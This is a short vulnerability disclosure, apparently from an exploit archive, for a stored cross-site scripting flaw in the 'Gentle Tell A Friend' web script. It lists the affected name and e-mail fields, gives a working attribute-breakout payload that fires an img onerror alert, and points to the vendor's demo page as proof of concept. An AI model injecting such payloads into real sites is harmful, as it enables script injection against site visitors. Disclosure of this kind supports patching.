# Exploit Title: Gentle Tell A Friend Script Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
Cross Site Scripting can be done using the command input
Vulnerable Field:
First Name Field, Last Name Field, E-mail Adres Field and Friend's
E-mail Adres Field.
Exploit:
"/></a></><img src=1.gif onerror=alert(1)>
POC:
http://tell-a-friend.gentleprojects.com/index.php
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr